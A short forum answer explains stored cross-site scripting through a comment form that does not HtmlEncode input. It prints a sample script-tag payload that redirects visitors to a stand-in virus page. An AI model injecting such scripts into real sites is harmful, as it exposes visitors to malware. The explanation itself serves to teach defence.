One example of how characters can be insecure is when a user posts a comment on your page. If the comment form does not use HtmlEncode, then everything that the user just typed will now be displayed as a comment on the page. In this case, the hacker can send a comment as follows:
<script language="javascript" type="text/javascript"> window.location = 'http://server.com/viruspage.asp'; </script>
For each subsequent user loading the page, a script is run (since it was not encoded using HtmlEncode), redirecting each user to the page using viruses. This is a very simple example, but there are many other ways to enter malicious data, which potentially even allows hackers to administratively access your databases.
James source share